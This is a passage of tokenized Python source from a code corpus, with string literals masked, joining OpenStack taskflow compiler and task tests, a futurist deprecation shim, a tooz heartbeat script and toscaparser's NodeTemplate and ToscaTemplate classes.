[ '<STR_LIT>' ] ) <EOL> self . assertTrue ( g . has_edge ( empty_flow_terminal , b ) ) <EOL> def test_empty_flow_in_graph_flow_linkage ( self ) : <EOL> flow = gf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> empty_flow = lf . Flow ( "<STR_LIT>" ) <EOL> flow . add ( a , empty_flow , b ) <EOL> flow . link ( a , b ) <EOL> compilation = compiler . 
PatternCompiler ( flow ) . compile ( ) <EOL> g = compilation . execution_graph <EOL> self . assertTrue ( g . has_edge ( a , b ) ) <EOL> self . assertTrue ( g . has_edge ( flow , a ) ) <EOL> self . assertTrue ( g . has_edge ( flow , empty_flow ) ) <EOL> def test_checks_for_dups ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( <EOL> test_utils . DummyTask ( name = "<STR_LIT:a>" ) , <EOL> test_utils . DummyTask ( name = "<STR_LIT:a>" ) <EOL> ) <EOL> e = engines . load ( flo ) <EOL> self . assertRaisesRegexp ( exc . Duplicate , <EOL> '<STR_LIT>' , <EOL> e . compile ) <EOL> def test_checks_for_dups_globally ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( <EOL> gf . Flow ( "<STR_LIT>" ) . add ( test_utils . DummyTask ( name = "<STR_LIT:a>" ) ) , <EOL> gf . Flow ( "<STR_LIT>" ) . add ( test_utils . DummyTask ( name = "<STR_LIT:a>" ) ) ) <EOL> e = engines . load ( flo ) <EOL> self . assertRaisesRegexp ( exc . Duplicate , <EOL> '<STR_LIT>' , <EOL> e . compile ) <EOL> def test_retry_in_linear_flow ( self ) : <EOL> flo = lf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_retry_in_unordered_flow ( self ) : <EOL> flo = uf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_retry_in_graph_flow ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> g = compilation . 
execution_graph <EOL> self . assertEqual ( <NUM_LIT:3> , len ( g ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , g . number_of_edges ( ) ) <EOL> def test_retry_in_nested_flows ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> c2 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" , c2 ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> def test_retry_in_linear_flow_with_tasks ( self ) : <EOL> c = retry . AlwaysRevert ( "<STR_LIT:c>" ) <EOL> a , b = test_utils . make_many ( <NUM_LIT:2> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . 
assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> def test_retry_in_unordered_flow_with_tasks ( self ) : <EOL> c = retry . AlwaysRevert ( "<STR_LIT:c>" ) <EOL> a , b = test_utils . make_many ( <NUM_LIT:2> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" , c ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> def test_retry_in_graph_flow_with_tasks ( self ) : <EOL> r = retry . AlwaysRevert ( "<STR_LIT:r>" ) <EOL> a , b , c = test_utils . make_many ( <NUM_LIT:3> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" , r ) . add ( a , b , c ) . link ( b , c ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertItemsEqual ( g . 
edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:r>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:r>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:r>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( r , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> def test_retries_hierarchy ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> c2 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" , c2 ) . add ( b , c ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( g ) ) <EOL> self . assertItemsEqual ( g . 
edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:d>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c2 , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c2 , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( None , g . node [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) ) <EOL> def test_retry_subflows_hierarchy ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:9> , len ( g ) ) <EOL> self . assertItemsEqual ( g . 
edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:a>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:d>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( c1 , g . node [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIs ( None , g . node [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) ) </s>
<s> import taskflow . engines as engines <EOL> from taskflow . patterns import linear_flow <EOL> from taskflow import task as base <EOL> from taskflow import test <EOL> def sum ( x , y ) : <EOL> return x + y <EOL> multiply = lambda x , y : x * y <EOL> class ReduceFunctorTaskTest ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ReduceFunctorTaskTest , self ) . setUp ( ) <EOL> self . flow_store = { <EOL> '<STR_LIT:a>' : <NUM_LIT:1> , <EOL> '<STR_LIT:b>' : <NUM_LIT:2> , <EOL> '<STR_LIT:c>' : <NUM_LIT:3> , <EOL> '<STR_LIT:d>' : <NUM_LIT:4> , <EOL> '<STR_LIT:e>' : <NUM_LIT:5> , <EOL> } <EOL> def test_sum_array ( self ) : <EOL> expected = self . flow_store . copy ( ) <EOL> expected . update ( { <EOL> '<STR_LIT>' : <NUM_LIT:15> <EOL> } ) <EOL> requires = self . flow_store . keys ( ) <EOL> provides = '<STR_LIT>' <EOL> flow = linear_flow . Flow ( "<STR_LIT>" ) <EOL> flow . add ( base . ReduceFunctorTask ( sum , requires = requires , <EOL> provides = provides ) ) <EOL> result = engines . run ( flow , store = self . flow_store ) <EOL> self . assertDictEqual ( expected , result ) <EOL> def test_multiply_array ( self ) : <EOL> expected = self . flow_store . copy ( ) <EOL> expected . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } ) <EOL> requires = self . flow_store . keys ( ) <EOL> provides = '<STR_LIT>' <EOL> flow = linear_flow . Flow ( "<STR_LIT>" ) <EOL> flow . add ( base . ReduceFunctorTask ( multiply , requires = requires , <EOL> provides = provides ) ) <EOL> result = engines . run ( flow , store = self . flow_store ) <EOL> self . assertDictEqual ( expected , result ) </s>
<s> from debtcollector import removals <EOL> import futurist <EOL> removals . removed_module ( __name__ , <EOL> replacement = "<STR_LIT>" % futurist . __name__ , <EOL> version = "<STR_LIT>" , removal_version = '<STR_LIT>' , <EOL> stacklevel = <NUM_LIT:4> ) <EOL> Future = futurist . Future <EOL> ThreadPoolExecutor = futurist . ThreadPoolExecutor <EOL> GreenThreadPoolExecutor = futurist . GreenThreadPoolExecutor <EOL> ProcessPoolExecutor = futurist . ProcessPoolExecutor <EOL> GreenFuture = futurist . GreenFuture <EOL> SynchronousExecutor = futurist . SynchronousExecutor <EOL> ExecutorStatistics = futurist . ExecutorStatistics </s>
<s> import time <EOL> from tooz import coordination <EOL> ALIVE_TIME = <NUM_LIT:5> <EOL> coordinator = coordination . get_coordinator ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> coordinator . start ( ) <EOL> start = time . time ( ) <EOL> while time . time ( ) - start < ALIVE_TIME : <EOL> coordinator . heartbeat ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> coordinator . stop ( ) </s>
<s> from toscaparser import shell as parser_shell <EOL> """<STR_LIT>""" <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser_shell . main ( ) </s>
<s> import logging <EOL> from toscaparser . common . exception import ExceptionCollector <EOL> from toscaparser . common . exception import InvalidPropertyValueError <EOL> from toscaparser . common . exception import MissingRequiredFieldError <EOL> from toscaparser . common . exception import TypeMismatchError <EOL> from toscaparser . common . exception import UnknownFieldError <EOL> from toscaparser . common . exception import ValidationError <EOL> from toscaparser . dataentity import DataEntity <EOL> from toscaparser . elements . interfaces import CONFIGURE <EOL> from toscaparser . elements . interfaces import CONFIGURE_SHORTNAME <EOL> from toscaparser . elements . interfaces import InterfacesDef <EOL> from toscaparser . elements . interfaces import LIFECYCLE <EOL> from toscaparser . elements . interfaces import LIFECYCLE_SHORTNAME <EOL> from toscaparser . elements . relationshiptype import RelationshipType <EOL> from toscaparser . entity_template import EntityTemplate <EOL> from toscaparser . relationship_template import RelationshipTemplate <EOL> from toscaparser . utils . gettextutils import _ <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class NodeTemplate ( EntityTemplate ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , name , node_templates , custom_def = None , <EOL> available_rel_tpls = None , available_rel_types = None ) : <EOL> super ( NodeTemplate , self ) . __init__ ( name , node_templates [ name ] , <EOL> '<STR_LIT>' , <EOL> custom_def ) <EOL> self . templates = node_templates <EOL> self . _validate_fields ( node_templates [ name ] ) <EOL> self . custom_def = custom_def <EOL> self . related = { } <EOL> self . relationship_tpl = [ ] <EOL> self . available_rel_tpls = available_rel_tpls <EOL> self . available_rel_types = available_rel_types <EOL> self . _relationships = { } <EOL> @ property <EOL> def relationships ( self ) : <EOL> if not self . _relationships : <EOL> requires = self . 
requirements <EOL> if requires : <EOL> for r in requires : <EOL> for r1 , value in r . items ( ) : <EOL> explicit = self . _get_explicit_relationship ( r , value ) <EOL> if explicit : <EOL> for key , value in explicit . items ( ) : <EOL> self . _relationships [ key ] = value <EOL> return self . _relationships <EOL> def _get_explicit_relationship ( self , req , value ) : <EOL> """<STR_LIT>""" <EOL> explicit_relation = { } <EOL> node = value . get ( '<STR_LIT>' ) if isinstance ( value , dict ) else value <EOL> if node : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % self . name <EOL> if ( node in list ( self . type_definition . TOSCA_DEF . keys ( ) ) <EOL> or node in self . custom_def ) : <EOL> ExceptionCollector . appendException ( NotImplementedError ( msg ) ) <EOL> return <EOL> if node not in self . templates : <EOL> ExceptionCollector . appendException ( <EOL> KeyError ( _ ( '<STR_LIT>' ) % node ) ) <EOL> return <EOL> related_tpl = NodeTemplate ( node , self . templates , self . custom_def ) <EOL> relationship = value . get ( '<STR_LIT>' ) if isinstance ( value , dict ) else None <EOL> if not relationship : <EOL> parent_reqs = self . type_definition . get_all_requirements ( ) <EOL> if parent_reqs is None : <EOL> ExceptionCollector . appendException ( <EOL> ValidationError ( message = '<STR_LIT>' + <EOL> str ( parent_reqs ) ) ) <EOL> else : <EOL> for key in req . keys ( ) : <EOL> for req_dict in parent_reqs : <EOL> if key in req_dict . keys ( ) : <EOL> relationship = ( req_dict . get ( key ) . <EOL> get ( '<STR_LIT>' ) ) <EOL> break <EOL> if relationship : <EOL> found_relationship_tpl = False <EOL> if self . available_rel_tpls : <EOL> for tpl in self . available_rel_tpls : <EOL> if tpl . name == relationship : <EOL> rtype = RelationshipType ( tpl . type , None , <EOL> self . custom_def ) <EOL> explicit_relation [ rtype ] = related_tpl <EOL> tpl . target = related_tpl <EOL> tpl . source = self <EOL> self . relationship_tpl . 
append ( tpl ) <EOL> found_relationship_tpl = True <EOL> rel_prfx = self . type_definition . RELATIONSHIP_PREFIX <EOL> if not found_relationship_tpl : <EOL> if isinstance ( relationship , dict ) : <EOL> relationship = relationship . get ( '<STR_LIT:type>' ) <EOL> if relationship : <EOL> if self . available_rel_types and relationship in self . available_rel_types . keys ( ) : <EOL> pass <EOL> elif not relationship . startswith ( rel_prfx ) : <EOL> relationship = rel_prfx + relationship <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> MissingRequiredFieldError ( <EOL> what = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % related_tpl . name , <EOL> required = self . TYPE ) ) <EOL> for rtype in self . type_definition . relationship . keys ( ) : <EOL> if rtype . type == relationship : <EOL> explicit_relation [ rtype ] = related_tpl <EOL> related_tpl . _add_relationship_template ( req , <EOL> rtype . type , <EOL> self ) <EOL> elif self . available_rel_types : <EOL> if relationship in self . available_rel_types . keys ( ) : <EOL> rel_type_def = self . available_rel_types . get ( relationship ) <EOL> if '<STR_LIT>' in rel_type_def : <EOL> super_type = rel_type_def . get ( '<STR_LIT>' ) <EOL> if not super_type . startswith ( rel_prfx ) : <EOL> super_type = rel_prfx + super_type <EOL> if rtype . type == super_type : <EOL> explicit_relation [ rtype ] = related_tpl <EOL> related_tpl . _add_relationship_template ( <EOL> req , rtype . type , self ) <EOL> return explicit_relation <EOL> def _add_relationship_template ( self , requirement , rtype , source ) : <EOL> req = requirement . copy ( ) <EOL> req [ '<STR_LIT:type>' ] = rtype <EOL> tpl = RelationshipTemplate ( req , rtype , self . custom_def , self , source ) <EOL> self . relationship_tpl . append ( tpl ) <EOL> def get_relationship_template ( self ) : <EOL> return self . relationship_tpl <EOL> def _add_next ( self , nodetpl , relationship ) : <EOL> self . 
related [ nodetpl ] = relationship <EOL> @ property <EOL> def related_nodes ( self ) : <EOL> if not self . related : <EOL> for relation , node in self . type_definition . relationship . items ( ) : <EOL> for tpl in self . templates : <EOL> if tpl == node . type : <EOL> self . related [ NodeTemplate ( tpl ) ] = relation <EOL> return self . related . keys ( ) <EOL> def validate ( self , tosca_tpl = None ) : <EOL> self . _validate_capabilities ( ) <EOL> self . _validate_requirements ( ) <EOL> self . _validate_properties ( self . entity_tpl , self . type_definition ) <EOL> self . _validate_interfaces ( ) <EOL> for prop in self . get_properties_objects ( ) : <EOL> prop . validate ( ) <EOL> def _validate_requirements ( self ) : <EOL> type_requires = self . type_definition . get_all_requirements ( ) <EOL> allowed_reqs = [ "<STR_LIT>" ] <EOL> if type_requires : <EOL> for treq in type_requires : <EOL> for key , value in treq . items ( ) : <EOL> allowed_reqs . append ( key ) <EOL> if isinstance ( value , dict ) : <EOL> for key in value : <EOL> allowed_reqs . append ( key ) <EOL> requires = self . type_definition . get_value ( self . REQUIREMENTS , <EOL> self . entity_tpl ) <EOL> if requires : <EOL> if not isinstance ( requires , list ) : <EOL> ExceptionCollector . appendException ( <EOL> TypeMismatchError ( <EOL> what = '<STR_LIT>' % self . name , <EOL> type = '<STR_LIT:list>' ) ) <EOL> for req in requires : <EOL> for r1 , value in req . items ( ) : <EOL> if isinstance ( value , dict ) : <EOL> self . _validate_requirements_keys ( value ) <EOL> self . _validate_requirements_properties ( value ) <EOL> allowed_reqs . append ( r1 ) <EOL> self . _common_validate_field ( req , allowed_reqs , '<STR_LIT>' ) <EOL> def _validate_requirements_properties ( self , requirements ) : <EOL> for key , value in requirements . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> self . 
_validate_occurrences ( value ) <EOL> break <EOL> def _validate_occurrences ( self , occurrences ) : <EOL> DataEntity . validate_datatype ( '<STR_LIT:list>' , occurrences ) <EOL> for value in occurrences : <EOL> DataEntity . validate_datatype ( '<STR_LIT>' , value ) <EOL> if len ( occurrences ) != <NUM_LIT:2> or not ( <NUM_LIT:0> <= occurrences [ <NUM_LIT:0> ] <= occurrences [ <NUM_LIT:1> ] ) or occurrences [ <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> ExceptionCollector . appendException ( <EOL> InvalidPropertyValueError ( what = ( occurrences ) ) ) <EOL> def _validate_requirements_keys ( self , requirement ) : <EOL> for key in requirement . keys ( ) : <EOL> if key not in self . REQUIREMENTS_SECTION : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( <EOL> what = '<STR_LIT>' % self . name , <EOL> field = key ) ) <EOL> def _validate_interfaces ( self ) : <EOL> ifaces = self . type_definition . get_value ( self . INTERFACES , <EOL> self . entity_tpl ) <EOL> if ifaces : <EOL> for i in ifaces : <EOL> for name , value in ifaces . items ( ) : <EOL> if name in ( LIFECYCLE , LIFECYCLE_SHORTNAME ) : <EOL> self . _common_validate_field ( <EOL> value , InterfacesDef . <EOL> interfaces_node_lifecycle_operations , <EOL> '<STR_LIT>' ) <EOL> elif name in ( CONFIGURE , CONFIGURE_SHORTNAME ) : <EOL> self . _common_validate_field ( <EOL> value , InterfacesDef . <EOL> interfaces_relationship_configure_operations , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( <EOL> what = '<STR_LIT>' % <EOL> self . name , field = name ) ) <EOL> def _validate_fields ( self , nodetemplate ) : <EOL> for name in nodetemplate . keys ( ) : <EOL> if name not in self . SECTIONS and name not in self . SPECIAL_SECTIONS : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( what = '<STR_LIT>' % self . name , <EOL> field = name ) ) </s>
<s> import logging <EOL> import os <EOL> from toscaparser . common . exception import ExceptionCollector <EOL> from toscaparser . common . exception import InvalidTemplateVersion <EOL> from toscaparser . common . exception import MissingRequiredFieldError <EOL> from toscaparser . common . exception import UnknownFieldError <EOL> from toscaparser . common . exception import ValidationError <EOL> from toscaparser . elements . entity_type import update_definitions <EOL> from toscaparser . extensions . exttools import ExtTools <EOL> import toscaparser . imports <EOL> from toscaparser . prereq . csar import CSAR <EOL> from toscaparser . topology_template import TopologyTemplate <EOL> from toscaparser . tpl_relationship_graph import ToscaGraph <EOL> from toscaparser . utils . gettextutils import _ <EOL> import toscaparser . utils . yamlparser <EOL> SECTIONS = ( DEFINITION_VERSION , DEFAULT_NAMESPACE , TEMPLATE_NAME , <EOL> TOPOLOGY_TEMPLATE , TEMPLATE_AUTHOR , TEMPLATE_VERSION , <EOL> DESCRIPTION , IMPORTS , DSL_DEFINITIONS , NODE_TYPES , <EOL> RELATIONSHIP_TYPES , RELATIONSHIP_TEMPLATES , <EOL> CAPABILITY_TYPES , ARTIFACT_TYPES , DATA_TYPES , <EOL> POLICY_TYPES , GROUP_TYPES , REPOSITORIES ) = ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> SPECIAL_SECTIONS = ( METADATA ) = ( '<STR_LIT>' ) <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> YAML_LOADER = toscaparser . utils . yamlparser . load_yaml <EOL> class ToscaTemplate ( object ) : <EOL> exttools = ExtTools ( ) <EOL> VALID_TEMPLATE_VERSIONS = [ '<STR_LIT>' ] <EOL> VALID_TEMPLATE_VERSIONS . extend ( exttools . get_versions ( ) ) <EOL> ADDITIONAL_SECTIONS = { '<STR_LIT>' : SPECIAL_SECTIONS } <EOL> ADDITIONAL_SECTIONS . update ( exttools . 
get_sections ( ) ) <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , path = None , parsed_params = None , a_file = True , <EOL> yaml_dict_tpl = None ) : <EOL> ExceptionCollector . start ( ) <EOL> self . a_file = a_file <EOL> self . input_path = None <EOL> self . path = None <EOL> self . tpl = None <EOL> if path : <EOL> self . input_path = path <EOL> self . path = self . _get_path ( path ) <EOL> if self . path : <EOL> self . tpl = YAML_LOADER ( self . path , self . a_file ) <EOL> if yaml_dict_tpl : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> log . info ( msg ) <EOL> print ( msg ) <EOL> else : <EOL> if yaml_dict_tpl : <EOL> self . tpl = yaml_dict_tpl <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> ValueError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) ) <EOL> if self . tpl : <EOL> self . parsed_params = parsed_params <EOL> self . _validate_field ( ) <EOL> self . version = self . _tpl_version ( ) <EOL> self . relationship_types = self . _tpl_relationship_types ( ) <EOL> self . description = self . _tpl_description ( ) <EOL> self . topology_template = self . _topology_template ( ) <EOL> if self . topology_template . tpl : <EOL> self . inputs = self . _inputs ( ) <EOL> self . relationship_templates = self . _relationship_templates ( ) <EOL> self . nodetemplates = self . _nodetemplates ( ) <EOL> self . outputs = self . _outputs ( ) <EOL> self . graph = ToscaGraph ( self . nodetemplates ) <EOL> ExceptionCollector . stop ( ) <EOL> self . verify_template ( ) <EOL> def _topology_template ( self ) : <EOL> return TopologyTemplate ( self . _tpl_topology_template ( ) , <EOL> self . _get_all_custom_defs ( ) , <EOL> self . relationship_types , <EOL> self . parsed_params ) <EOL> def _inputs ( self ) : <EOL> return self . topology_template . inputs <EOL> def _nodetemplates ( self ) : <EOL> return self . topology_template . nodetemplates <EOL> def _relationship_templates ( self ) : <EOL> return self . topology_template . 
